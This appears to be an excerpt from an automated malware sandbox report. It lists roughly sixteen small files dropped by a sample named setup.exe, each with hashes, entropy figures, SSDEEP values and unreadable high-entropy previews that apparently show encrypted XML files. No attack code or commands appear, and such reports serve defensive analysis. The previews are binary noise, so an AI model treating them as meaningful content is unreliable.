              Preview:<?xml..z..O.o.3..2m..u..y.Nn..'vH.^.v.h..>M.X[...d.c(.D1@..T7..4....Ag....``...m.B...L...g0."JU.. ..z.z.....,..1s(M.B.-......E....+/Tl.8[.z~b..q.z.......b./v@%.n.[.?..,.s....a...vW.w.....O.>.\...hW....Q...QgK.Y....wO.3.mB.`Qp. ......A.P..4J..Dx8.v.H...^..j.J.zP.X....[.+a/F'..j....w....^...k....Op..N..*...h. M./.....%qE...K.z[.~....9.(..Z?........?....'..\f..e.@...d..&M`*C....Z..M.....7......l.....:L...dm..@..D.{..kU.a.t..!..v.../~....A..... N..N]....I<.`q......[.$pW...M.}.;y......r*..h.&..SE.......W.6...U.E..}.]C...#.9.-...XgV..R^;_..d...../..2.\.........!......*4.ct..*.p........C..w.<.j.X2......\....#.U...l.%.T.......X.Rf$............R.....C..$.ux..E.f|..........P.....;\..].X.%3X...U.Z.J..&p`b...7LE~d.^..q.<z...4vOd.yp%1..vWP.@br.XVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):912
              Entropy (8bit):7.771810548072163
              Encrypted:false
              SSDEEP:24:SOBryxUgRuz14ueVTctha4r3QG/V5EfAT3H5bD:7dyqgRbZShxwfAz5D
              MD5:BA7FFDF6A0787E92312B894B7ECB340B
              SHA1:8F82CB015AF6E221D82A56903FA3FBED5B0E71CA
              SHA-256:A1DF59EBBCD3E24BCCECF7B63AAB7EAC4B6D9AAF8E3740D644C08F190CC98DFE
              SHA-512:DEA953198F8DDA9C4FCE1171CA8E405518E2A287F6AF077E75C5FDA460DC507569675840B03156525161B0DE43581926A056605704F5998C52B37434F4D551E5
              Malicious:false
              Preview:<?xml.F...S..:h.......l\.8A.5.......l.t...H.....=....u..!}.^n..NV.[OC.C.v.|..3o..W...(..V...'...r@.......i(....{...ji..o....r.]..'.@eFv..._......".t...|!Rw].dd...4:..*...tA3-$.2,'.B....k6.5..aB.Bo8.......jO.8D...2G+.....fTy.......}7Je..[R....h"....C:A._x..q..o(..a.A.....L_D....lAE.Z.sI... )E0...r.[...j[..V9.}.U....@./S.......].(......H`...]i...;...+..VA})..A>S.......L......M...m.B.."....<h.5....x....b.=}......J/..;..3K..8.h..?.y...}q%.moA........x......QTu....N;1B..Y.$ly.....?....F...7..t../..c"B....b3.jr...B..p...C...K.>vF...m......Vo.Cm.`..mk$.W.$......=..n..Q......LQ.......f.S..1...1.[...b."......dy......{-...9X.1.........l.U...........|......<a......j..SC.S...eq..M.h...u...G..-..m.w...`.^Nc...........S.s"A...]*....W..u.Z......".R...#.Y...jp.......g.:rOM).a..l...q.....,..U.G.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3310
              Entropy (8bit):7.941475814031317
              Encrypted:false
              SSDEEP:96:0okOMRSEUOPzTGYc24cbda5yVImcbCwCkBc/75bS:0NSOqYcHG05NNfc/75S
              MD5:553699BE599AFC365A18C3905024DE19
              SHA1:024A4415DEE932B0FC30EC2EB863F191DE2B60FD
              SHA-256:85B65E11C1A66C6CF9CC701CBDD435C8B644DE84116E892E53886473BFE964E3
              SHA-512:EB78FF35F598C9870C6BF86AB0F41FC1FD5F037529CECC373A31A31E9CEB92F1E58B6B5015E3528A7CB0F39AD351149ED34DBED65D001F8D5C74F1AD86257F7A
              Malicious:false
              Preview:<?xmlXx....dA~..W>:|.6'9...h>..._.@.E......5N......y..a.h......0doPjg.5l~o.....l4a.......\P.j.si.h..Z.G@oj..zX........g...0...P....&..4.....{.....Wm...F.o.....3r.|...P..E.Q(.n..'7.$.)...r.$..j...m...O.]...*%....,....E..sFA..W..P.WK..%.f.K..}X.*3.c.rpL.....VST.i..A.)..9..;q......#O.mj....!.DZX..g.g..:..M....lW{...Y..j..9Y...+G..*..6..#.-..y.X.(:...a..A]..O.....!P~....y....~...F7g..A!M.z....JBD.k....+..+]D.C 0..@_.iBd......H.B..K.~..@}{.*.i$....-.4`._.0...[.{......L....'...K...nP......3f=u....).A.y.8[h%.. /.......].u..*m......A.@..%.....f.@...M.P.....w..n.....wd.....l.2.`....n.r.^..-.!^..*...C....?d...dv...3M./..;.........+.....~U=..`..M...5... E.......".n..+.vs....BW.y.3U.B._.(.M.r.9..8.......x.#...)..V..L..xK..f..x...3E3...>..0...s...X.]S;=..`A....[...v....z8a..H...L.S...F.s..pz. .0...I.KI.#...2......|.|..i....!j...P&q.,i....V.....u..8...8f...b.$A.=..1..$...Z.68.#:.........J..hd.T.T|..`0FJKq2.H..>....o....6..(.....[.....r?..?_k..a
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):910
              Entropy (8bit):7.737156259381601
              Encrypted:false
              SSDEEP:24:T11Lpu4Ha20kfvVdMis3oPKy7MUgU6XSbD:T7duB2xvVdMTZTUyAD
              MD5:2DA30DE21A7EE3CD5312BEE640D46F83
              SHA1:3AA68CDB1CFDBB39FCA49212F8200D27E96A113D
              SHA-256:766F6BA142D3B9A6D5E44478AFD4AAC30CF5AB0E049834958E7C227A94AE3F0A
              SHA-512:7EEE4672FE47E942AD3407595E86829F375D50501DB97296F86B69A00D5F2889ABEBF28563F9A08949D02FB73409CA2AB40D340E324D98F82FF55F4713E4CC94
              Malicious:false
              Preview:<?xml'..~..'.&c.B...evr..(.tF...e^..(^P...S.jb..a...l@...!..W.hr...0. .~q..j.b.....xj..........y.}A..g...x.]0d....y`.Z....G.....`...<Q....:.h.Y./.u.5.Puly.o:..(.O..|..4K..0..u..$x..":..?......S..c.L9.E..B.jIp.Z....L.v.;........zb.....@..b...C.......B&...7g.?..W.n....i.08n-.~<..?..v}......$21..h...g?k\.{{..G%..2..0......+i..r.}{..`~...4..&.....#4.,...E.&...D..rPQJ......VW..eq..$............>.....-....._Hp.i."l...?D........O.1....]?..'...~D...h...~..|...R1+..$.H...q.y...P..<.~35......m.(v.t.bgs.....}..X......N$.,.7..pU......*...D.Y...n."D:..9.[.+H.......!4[.<Y..<Q..l<....S.f%.....N...^..H..r.E..jx`...]Nm...6..`@.U.g..G..+9....e1.$(.b.~w..G...p.l....x..-60..l.f.?......s}&.A...vBU...3.@h.l..^gf..,.V..... ..=W...4.W.<....;[..../..q......1O`..1..e...N.7.C...8.k.!K!...Q?...>.}.@6..A.%H@..RT.IVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):941
              Entropy (8bit):7.746721509608334
              Encrypted:false
              SSDEEP:24:+52Gl83v1uMRsvONxfJoD8bbi2vFZ1vqMbD:+529v1uMvSYZFqGD
              MD5:D77183D43DD0364594D9B564F56CE7F8
              SHA1:3B58D9F1629EE0E801CFDA6F02C516B938D7DC51
              SHA-256:BF765E0501097D075E71D47115F20D37325B4F1DA7C5BC6AA23588CE9D785A5B
              SHA-512:A87EA20FB24F797691984A13CE458BD0FDC6EE3969EF410A8C5DC222F846611C081D2B60FEC7577273F0F1ABC33B31B3A5A9429891D59E7D106CFDD3385EBDB6
              Malicious:false
              Preview:<?xml.:o....7.:..K..F...{..{5.!.u.~."<....b5=.J.....Z...Ey..z..!...8J.,.>qN.G....Z....m...u.....H....^zL.h.z6...X..b.&.e..dB..2...7...t..........1..36..iN.*#"D._.......euH..1j..8..X..Z..1.c3Qw...9.....M..QJw....7.K...d......{.#..A..3KRH.1.P2......J......Fs#n2.f?...:.E:3._rS..Z&)I5..<SHO.....eB.:..'...s...f..y.V..8.#k#..8...4..Z.T.W.F.r..... .1...CZ.+m.-%....hc.&....y..En...X.nW.l..7...|....W/..@B.bBR......2..{.?.~A.-.K.....2.W..>7.m...|..V.`6.13bM<QV....%q%.N..>.r.......u.....1.b3.k.k@....s..{..BI..@...E4.x;.PT...oQ.d..^.IO.w.8....$....\...l......6....Y.6.........&YN....q.............4K....z.-......,.=)..{..........}..Y.....*..$...I@?..?..J...(...%..^w...$..B....r..F..y.....3k.{f......U..IW......?............V.=.....eO.T0.4.f..`.+..T..#]>....L..b.6=C........IG(8...KC..V.8.[.$...b.Q.<4l.>XO...hf.5..mVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):787
              Entropy (8bit):7.720437548673579
              Encrypted:false
              SSDEEP:24:FAMtNC3O4TnT2uAvDVYPQPOarUqykm2mbD:FAMtNqJ2RvhwQ2ar8km20D
              MD5:A849E6DD15A9AC7CCF00F26327E121A6
              SHA1:5E3654A48D82CEF5B1A1CE14E5C21FBAEDE6E65B
              SHA-256:1A48BD897BE707BD4EF1523D4E8A0BC7D794CE687BCF9F55BCD0D549F5283559
              SHA-512:17920519B7411AA9461A2D25A57E6659C879C79D5BDE60F643E54D843AA9656B3DC37294A97506E11A7F0A1A4C8A9F2BD7B1FBFA17B10A798DCA25B5A05986F6
              Malicious:false
              Preview:<?xmlZ.q..............pT. ...v...^..(Y......SQyc.h.........F.)......Y.M.C..`...RI...h....ci..0!.h.....g.s........rvh...^HO.|....A..5P...iT.h/8?.Ltsd....9.iA.b..=.L..g.b...X...I."....X.RX........;R~z.BH4.....0[b.......%.........j.K...?.......R.5g....)..8...o.0.Nk.m.*.)...Q.3./.....o..c.....i.e{.z.k{...7;....L..e..M..G..x3...y`..k.r....)..U.....'."...RT..+....(.v.+..:Z...o2.>..S.B....7....f2........Z...W~.3......./.......h.....|._.e.q..t..$Fc.;..^..g.........0.].}....A>."..z*b.dO|.......qx....R.........$.nk.wQ.w0...2n..E....L...b.;.ib}[7...$.X.......'.c.s.g....^ x.?0!...[........BO.8..C...g7/.K...>S....v...y.)......d\....i.d..c..j...bG{....k.7b.7.-gVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):961
              Entropy (8bit):7.792412598880395
              Encrypted:false
              SSDEEP:24:nOR6VhabrI4vCL67MuTdnFapA+PJmXztFnWbD:nOR8GI4vC0TKpYztFnED
              MD5:DA9428EDA7500FC17F461AFC44C16C54
              SHA1:DA63829B8D0A23627E7053EEE26CAE2F4BEDFFDB
              SHA-256:4C80AAFF778D01C98D941047342E8D2746D25409B00F30A37C6ECB1E80C67F7D
              SHA-512:238B5DB1AEAC8768574BA2663D57F63D13E7877D0118757EE5C9EBEE8DAB1400E04BB5241AD800166E2B0BE928724608AA16CE4C67820C46F6F4037A1766B905
              Malicious:false
              Preview:<?xml...s.{.7.4P?..2.`.?.k....=..A..i.-.S.u.....@..?...A.D.R...-,...>......}.9..#q...b.}(.."......h.......s.....,...Y.f.t.c.$.h.mS..["F....v..!......5w...^.S..Pq......@b..*p.x9k..(...^...Yt.|...,.!..Y..P7T....0.i..s.......O/..#..I.N...=......;.$:..cw.nd!....5HL....;Q..z.\.&.7..h..r..N2..q..z.=...os.@.z.l.-..uj..C.viI...i...8.^j.b.S....jz..x."8..0..T.m.(,5....lF.5...IZ..NA..).^....?+.-..y..D.........).H.k._RA........:..D.a....._.l.s......bIY.K8xp..!.z|.....].y#."....WT}.....8h.......ydu...:...............V.J... ........G....\.F...1.Y.....-.C....{.q....z..b..!..W.S..8.j...s..e..8.|)'..Yc..U.{l.........mY<"Se!.L.......s..SD.?....(.hm.~O. .}........`ki..t........U.#D.D.).r.."&Q=]..6p.g5K.'2:....w.,...../.9D.u..z.=....>.|&-.....E......._..m..X.X.]...Z;.....c........I.V.A.F.7....+!(..yJ......|....Q...K..I}.y.i...l...Z...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1131
              Entropy (8bit):7.821141341028575
              Encrypted:false
              SSDEEP:24:vqSLjLj5zzhE0YGegWsOXu8jGh5S4rB3WIjSsrUvrObD:LjLjlq5GzC+8jS5UIjSFgD
              MD5:E41F4FC9BF0C09F574C310DFE004BDF5
              SHA1:BED36E0E753124B2963C115FA761B64C1B64B76D
              SHA-256:6724211B2F29FAD561104F7AB728D75BB9A5B11E83B83C661F83626C7D542DFE
              SHA-512:179E6702B25C9969AD7F2F095BB26A44A123C9595BA87A612FC7E89DEA970069F2610DC1A217B65925A0CDE71A970BCB80D2FD60D7427FF5AC5FC23E7CEF0929
              Malicious:false
              Preview:<?xmlg..L. ..#.t.._..q(}t..D...(.i....L..~..6..At..{..!.(%....O(..".}S5.......]i8Br.9...K*...W.....g.....r...@.I.p.-...l...V......%....j...%>....J!.....D..R....Tr5..).907..*f.....n.r..R[@.F..K....J..vv.R.......'..,.n..t.<.....lj..S<..<...7.Ga..o..m.........aoL...$......FX....L.f.f..t.....J....t...{..2...1....}f.'.).....<....$...#.F>....m.,-..qu..+,.?..0[.IIj....../U."+r.)Z+ &3...6.L.r....9.l.....GW...j..{...Pu..8.....Y.0.C......"..5[.....pg.mT.(.....[..#..m}..PQ.[...Ys...Z>..yvy.a\..s.....e.~..9.......E....:.).#:.F[..ie...}..D..w..;.....qJ.>.nl.<..iP.:).=.]<.^{..Y6.4.lR.....fo.1+.n..M.4y.O.u....@....@.....$.c.mx.}I....w\1.Cop.O.a]..&.<&..........._..N.%i!.8..mTd&9.......+..rn....7..4..o}I.tm.......+G...$;5qo.y.."..(.= vl..p....%x..j..V.L@G...y;wq.8..{c.9..H...l.^b.KC.&%..l..G<.....U..-..._c\....,L:....*.-.j......F...J...-...P......+".N....;..Q.n.....}..re.d\..`c.V..;......$...J...E.,..r..5>....X7(?\!........,M..?...?..\- #..?..|......dGW".
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):987
              Entropy (8bit):7.7637220513880285
              Encrypted:false
              SSDEEP:24:vG7EpEURcnI3BR4pauGzLb7fTshEWSmKeY9obD:vGsBRz3wauifUhEWY9yD
              MD5:9FEC468DCF5E602DA93959133CF93C1A
              SHA1:2C046D54573DCBD6B5CB204DEFD3D4E735F544A7
              SHA-256:89FC72513877C70AB926572547DD9996C04FBE0EBB016958569A5D7C9E8E579A
              SHA-512:4F57D86AC8ABECFE7C18CF35D17661C54430BA20B3CE1EF40EFDF86CEFC672A12F96644C042CE279CA569A72537E13C62FFACD8D8B19BA34D5C1825E64029651
              Malicious:false
              Preview:<?xmlG*P...W....l?K.........x.-..N.j:.N.8...s=....a+.1K...Gx. ......'..F......o.,....>i...L.f...#........+..>)......-..G.;.B.6.]...AukQ..2...d...e....n.L......(@.....V...X.i..-=..x.o8.]~.n8.|..4.n..T..=..U.Z...3.Td.<k.qg?.x..l{.~...{,..{..k_.B.x..8....Q....Z..Tk..2. ..dz...;.G..8..gF..Z.(HxD....<..KkLJS.*.@.<.7.........FQ..L0:.\......==c4........|.;.....K.l..JD..0.....s=.cg.pud...|.Z....i.s.........&.b1(&.~@Q.c...:..d...1..t..=...k3;...o....gE#H..a....!.=..R.0h..}n...[.2.i@... .L.f.w%j.]...S...S.1l.o....@.I.B .2PJ_u=p....l.eh&'...s.6..z.2..$......`6...u.w;B.g..#.....L.'./rj.......k...'.1.......;.=<^p.Ft.j........Z\.lK..$.\........<4.......1.....m.53C..B.c....D.X7z.i.l.V....B...]..A|.f......]..zI..].....i...b...0P........F+.]....+.:.......u.1.2;/.g.$DN.......Nd.>.2...D..vK...wm...J<..QxO...~....>^..B.b..@...#...K..49.7.1.Q#Z4....R.y..6..>..WCk~VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):857
              Entropy (8bit):7.758261731967429
              Encrypted:false
              SSDEEP:24:d/Z2q/dDRnsknyD0uhUM0IQdm+Z3iRmYUq1fbD:9Yqo8yD0uhUM1Q4GSRmYUq1DD
              MD5:44060E0D880420F5690057A0F6AAA90D
              SHA1:11B4654F5E874A4D62F7A310EDB01D49F94D0D82
              SHA-256:084796A8AE6C80E11336A31235B42082AAEDEB3D685534F2363D94D012194A43
              SHA-512:C2D7B638B4144388E744486669919DE5DA9799A9588CAB3C42AA42985F4C6ADA716BB83AE97F63B56032ED324D5A9CB8B0E31F041F8BAFA96C2B4B2794050F98
              Malicious:false
              Preview:<?xml.h..4..Z......rz..C...5...:....F....W^...@...A`.#+........<.......Cr....#.......p..P.[O.@...r....c5aM...R.-.g...................*....\..*cFGR`......"2....E.x....`Y.<..V,..,..5W.)..vL[XI..T..A"..J..4.WYa.1.N.D.a.....`..D...*..0y.:?.S5?..*P.....a....k....H.. ...... .)..~.s.,5.P...c..n.r.5..1.......~f...RU.!.....G....%<...(pe;.G7.C..*"Ar!..uF....:...0.}T.c.}.....EmoP.....o&....i.E..[....]..h.%.TT...d_....P...>c..<Vh9.k...?O...q...0.Bj..1$.B...H....].In..............#..t.3........8.....Yt32Psn....0~....Dc..U8..9.J....P..o8..l...@..|...Ek..drP.3`:J.. ...1I...&}g.oH..k...NI..}......|~......qK.\.z...}i.^.A......aes....N.x..CW=.=....+.3.[>u2..u........M'...U,3...".v.D.I.@av.f)6..?..S.....Gc.=t......~..<..e.6.<).2..M....qVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):859
              Entropy (8bit):7.7526655723336875
              Encrypted:false
              SSDEEP:12:5LF0/dHwDpwN5CTIZyOHTIzyssWk2PEZxKsKl7Wr9dNoatz5AJcWTKRdOvJsMR2X:7OZ90TcNkys/k2cLal6V3tkEOvWbD
              MD5:1933F3A1041348C0FFA20572999FA248
              SHA1:6E879AE7CC48EF1ACE964FD35FFA464E71E4EA1C
              SHA-256:9C90F08774A473617D24CAA95FB2FDD351EA660C4443DB691002A6089D511FB1
              SHA-512:1636A821D274A95F5B354745D07929AAF4DFA1D8699814C00B962F65089B7CDCAF98894B15220687E66365C2EDC903C1D8C4ED4343FE4833962256E526C7DBE9
              Malicious:false
              Preview:<?xml|..L".=.00......>...n....".X...t..=.~...q.w...$.........j..}.\=..}...........5.M..M..pE..x..ba..P.D...dL..;.x..8y..Z.0!.g.-..../P.......TO...........w*)$..+.V.Y..D'G..<C.S8..y...,l..}i...EC.....5h.....ti..Q...SO...o.....+.<......3.%.k?.UXE.W]m.k..../])]v[h..x.O.[22......3V......;............^.p ..b....).K...#...9...f/..t..s.C(Z..b.&.xS@...`.w.p.p...-..^.,_.W.J%.pV..wypH...|.L..."....0.3..w....'.5.....s.4.x....]....k..sG.f.....p_O...hT...7h%...mj.R9...x.0.i=..-I8.#./..Ot...%=...C.a(.......q.9z6.!8<....`#..)G.Z2ww.Gs.....#0...Q.B9_FY.&.....V.K..(......hV......\,..........q......O..0............O...l.!.z.dV..........e...H.k#.`<`.\...`-^z'...Z..7.oX..*..l.S@.D...#X..l...{.K~I.c..v.|.Q-z...[..U=..8.}y.k.....\O}..&7@.@M..I.!/1...h.a'Y....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):725
              Entropy (8bit):7.6963123886453255
              Encrypted:false
              SSDEEP:12:uWfLmoBeA6Ns+BYQ0hWu6LiGKF2P46lbA0yV20AdbSpm43qcbx8EqMQsMR2cii9a:dmq6hGlWnLm846AZ4bSpmu4MpbD
              MD5:D10D53832715ED4C4F7E9782CB1D1B9C
              SHA1:C17923608B1C84EFE56EB7C9677ADDDD3A0053F0
              SHA-256:8E266EA73620AB124FCC647E505C52FD792AD2E639E4CD30BA46D5C4B52A1A73
              SHA-512:5EB72698B9ED4BF4DA6C83A9F80165B539BD514697CB9EC5DBBA8401236AD73B6C893890F131AC0B4834065A744E8D74DFB4E54DA4A678C0A60E90AE2488839B
              Malicious:false
              Preview:<?xml..1..=....S...d=..S........6H.u.*......GqJLx.....|8PJm..~.q.H...F/.RCx{...d...z.....D...S.f=*%^~..P..K.o..u3.y..*...I..BN0y$..6....B.....<.F.....aNnU.....MIw2.u.Y...{v..B.*....NVh......~...d..-.:.]..e..p.I...p..[l.FT.....f..#.(9.K..........A.Sc,..^f~{s|-..%O..E....b..g....%..gL....r..D......U...J.*..Rz..r...>....a..]....).J..3>P. 5Tr...% 6.&w...:.d....F.....r.T...t.l.4s.D.Q5.Q`Xg.....S\.i<W..T...R..Mp..W.M..C./......M'.....9..y......2Y..d.4.@w.^C......e`kh...*....DE.5cq..z._;;.n............@.....Z...../....}..y.Mi2.YY...e...F..|DH#..I..+..I.f.xq.?.........{n...`.Ff.c. !Q......%.....G*7'q...V9P8....T...x.. ...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1175
              Entropy (8bit):7.819474538765062
              Encrypted:false
              SSDEEP:24:tkXKEbtpTbrTEWd+NaJqKFbsg1kxkwwwwrf1QIeXy9mbD:t1otpzT/FYKkfQf1QFHD
              MD5:0772E9ACCAD2FE720D5AFF23B99E460D
              SHA1:B5C2188646CCD70377B311F233E2534FB287B39B
              SHA-256:077370C0410529C1ABFEB786F7B4B4CAB59FD71F09F5075D8B92B07C35E173B9
              SHA-512:09F98FC6EC2C1F6EEBB372747609C18887FBCA24D2B54B1CEB215181E1140E24A5CDC49FB1B619DBC00B3C970989375EA80931E1D5A60356F24E5A14F6957300
              Malicious:false
              Preview:<?xml....w.8\.......!P.........z.|..I......{9v."....Q...(.....:C..6......|J [ov....`.E*.k.....+...ZZs.C..>..VT.Qa...t.m.Z..q..v...........D.?....E...^7.......z...Cd..zW..C..i.P:;.\$..I8V*.W...B...qq.n.@j49..S.%....i...<...c[8.6...8...Cn..{*..r.O...;Q....y....r.....sg.qi...D?..q7.,k.7G....>.....\......Z...,}D.{......_&L.LF7[...y.C.L.......+xY.qU1..7.}..OV..jR.zW......t....@u....N..0..#..K.. ......sf....f.p.....eH.....O.-.....,.............s.T.(.j.IP... ....\..<.&*.~..2...... -...a..2.E..q2..$.Z.......F....*..>..*.<.....!.8...eWl..^......E..K..............BF{..?-..=. ....ys.{...C.;_Q.eHR.&....M".D.-.^...a....3..#. .......tz[.H.>R...}..REd.....L....O.UM....d..lc.....]........Q.!.Oc..e..K....J...'.f4.0...^.L.U.;.x..\A.,..:...[.K...E?..x.Z.s...]S8u.....H.xZJ............q....?H..FR........_?.a2.O.V..............B...O...#...c(h........G.."J\.U..x.!.4#l[^.i......w.H.%.R.Y..}.T...&J>.).g@..7...>W...d...3....c...:.c.T.h...ZX...S...@.9p
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):724
              Entropy (8bit):7.682649937855289
              Encrypted:false
              SSDEEP:12:pnagv09SUDaDoGVGz4e61cwUxNC1qQ4NRQXnP0Hu494Ew2jwhu5CsMR2cii9a:pT0YUDKMhtNiP+utEw5+jbD
              MD5:2BD1B330200B3C692A931063462F4C7D
              SHA1:3C834639A0346D1A76E461A7298FB8E1C2BAD1C1
              SHA-256:EB23D866E5B5CC35187DBC439DDC821B9517EB8A5BD2147AB4ABE634E1E39F7D
              SHA-512:B326909F2CFFA0585E898E0FBF80F7D2E92B3769D5D3DFD9AD326AB87D606878F3E037751CB13C60D7348A5E5E66E8CD69BF308C17800B5E8C18CA06712DE523
              Malicious:false
              Preview:<?xml......p-...>#.@R.....Fw.@..k.al...}..vX/...8.x.E..txB..... .hb........(T.a.F....(...F...j.+....+.h.....j .N)..."..v........B3m..etG.Y.4+/eN..n..?..<...T';e....Q..,..#.J.?').3-.q5.R.} MT...q).E..5..6.<..U./.[|.KbEE.O....y#.i..6*...y..-...,E...>...7c%.<'|f...XX.#.{c...;.W?....5.}.qg...v....d.....G.3.... .KC...HF..=Ak.R...\..c..,..^.d.*..~f`...~....<o.....)..?j[.[.S.-..%...@.7.....QG...*"M.....L5i7.....O...ww)..qQ.[.GOm.s.^.)N.!..V..U&.".P.Z..._.'...U.B:d..dB1o:<.~?vh.eu.=<*....Z.Qh).e.u.....<.Tk..-H....,...@.[Az.z...d].....<INC.\I...X.8.'9...f....i.-..%0.F^R....6....Q....t...\-,..w5.2R..........X..h%.......a..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):746
              Entropy (8bit):7.6801723921429454
              Encrypted:false
              SSDEEP:12:uth0EvJaJ0gmY7Tspnupw8oVRT00eYxec0P+kX+qk1ha4zfRVx7QxkgU43lzC1+z:mhxJql7XspuQhe/jP+kXhIh/Z0NU43lt
              MD5:37FA1BB03DA4074422668D6802CD3E49
              SHA1:9EAEB8E6EA57DB0B41824B4D3A527F632F4F388B
              SHA-256:7113AE221F4705C194CBC700DE1453DB3F6EF4E4902AC8A2C4DEA295BEE35F6A
              SHA-512:718CF5A5B01F3FE9D87BF8FCE3A99416763F9901C14B7751DEE5D24D3575A99DAD1FFBEF4F6393DC126678B64A70825C7DC091AA353C06750A783C7640D33E22
              Malicious:false
              Preview:<?xmlVW...m.&........+..........}..!.-skq...%M......Z.Qs...R.%U....7G..c...8yV../.'.Y......I..."@..$...H.i...:...hY.S...M.7......dU.......bTU....KZ.......DY.f..N.....I.6.k..@%QY......P.?.2.[.G.._.YE.l.....ALSt..$.(....a.>...!...Ziq..u.'.s.]c!t.t'.....B9..E.n..L.bq.f...'(n{..=....%...........T.6.....QM....;..h..M.9.2j......@tj..h...0...`..+.h..N......u.SR.9..JS<W`..>`6.`%.b.T.#..G...w!rP.ZT..Ct.,.Pj.T:...D?...U.z.4..(...R>v.*.9=.!.c..L...............k5X. ...G.!..JD.^.....lW..E..E?....]...0.....0E.;....7o...E...V....N....13..V'.%sD8..I..y...JS....WK.I..........N.E...R..3Yzj...6...H....\.QW..7rx.s.......Ee..&.DZ."d)..._..,'.uUVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):857
              Entropy (8bit):7.770035235641101
              Encrypted:false
              SSDEEP:24:oyJ/XdCwNnB5YosamxjvtLi2Bkz5HAigXr6bD:Z/XdjnnYmmFvtLi2iVADX0D
              MD5:0049F7ECA81011E50EAC2BA77BF04114
              SHA1:CA2073542436A2FF40F22714A67253A3C061BF82
              SHA-256:438D51378F3173E7C20330F03375DE100D94AD000E80758F191C593C2465D8C4
              SHA-512:7FAEDEAD0D7CD63912916B68622E0C03320AB5EE9E9141FD2C9F7D82DDF11A90B0F32F7EC58B3DC792874B6ABAC8A4CA559E8639AD90C010D4BCB5E4BEE0BE86
              Malicious:false
              Preview:<?xml...2'..kT'.;..w......f."7p.n.@3U&|.w).2P{.g.s.i.S<...8.d.M.{.Y..c.H. K.;-..p}F.`.........N....m.J.X...Z.q_..VwY..Z...?!.N..c.6.,....rs.d..:..@.d.D.9.n.....hlH./.....;.....o........W..p......-....y_.......{..~"5.z..=".<..}f.(......XO9IK..6.....yy...a..;}....4..W....>...?D.....F....<._....l......`....vpc.v9..R..?..V.X..$.]K.,.....T.....a.WT..P......h.*.#o.K.IWzo.....1...p...I.r.q..S..R.W...z.L...&.~.....C....|?]....C]q.B.gd.....j)...PI..w..0...O.sZ..yr....M........,..P..,7O.d...vg.f.....}...+.i..".^.."..G..P.]C.A..?}....A.e..Rp.m.Cl..G%.fI..im',..Xw..t.ZFt8.O.lv.....8..x...*......F..&6.c..YnC./........,.N......$../....~.KH,}X*..........;.J........t.......b......-a..e''..(->."......A....T.Rf.......0O...Xz~....B...m)T$....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):886
              Entropy (8bit):7.759277918835769
              Encrypted:false
              SSDEEP:24:gZXYzMmLiGsNX4x1AKD7SgpC+2JpJtmDWbD:gZXYzMmYXuzDviJtmDED
              MD5:0492E216E102E3A106F84F7BD4AA4DC9
              SHA1:3A0F7856A17E20E4777C1164111C31C3FCB2E6C7
              SHA-256:E31FA4E0424DC941E656600E395B4B85874058E9016F01AD394EABDE7A56A860
              SHA-512:F4CA636CD4F2D63BFE17B495B5F6434881278B0648FFF4BFDB681D02BC077540F1BB0FA38A0C9D66BB1106B23D901FBB06F65E9552C117A2122570BE5C406691
              Malicious:false
